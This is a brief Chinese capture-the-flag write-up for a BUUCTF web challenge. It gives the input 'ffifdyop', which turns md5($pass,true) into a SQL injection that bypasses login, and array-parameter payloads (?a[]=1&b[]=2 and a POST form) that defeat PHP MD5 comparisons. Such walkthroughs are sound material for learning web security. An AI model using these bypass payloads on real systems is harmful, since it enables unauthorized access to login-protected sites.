题目地址:buuctf
在HTTP头里发现Hint: select * from ‘admin’ where password=md5($pass,true)
关于md5($pass,true)
参考:https://blog.csdn.net/March97/article/details/81222922
输入ffifdyop
查看源文件,发现
<!--
$a = $GET['a'];
$b = $_GET['b'];
if($a != $b && md5($a) == md5($b)){
// wow, glzjin wants a girl friend.
-->
md5 bypass
因为md5()或者sha1()之类的函数计算的是一个字符串的哈希值,对于数组则返回false,如果a和b都是数组则双双返回FALSE, 两个FALSE相等得以绕过。payload:?a[]=1&b[]=2
POST方式传?param1[]=1¶m2[]=2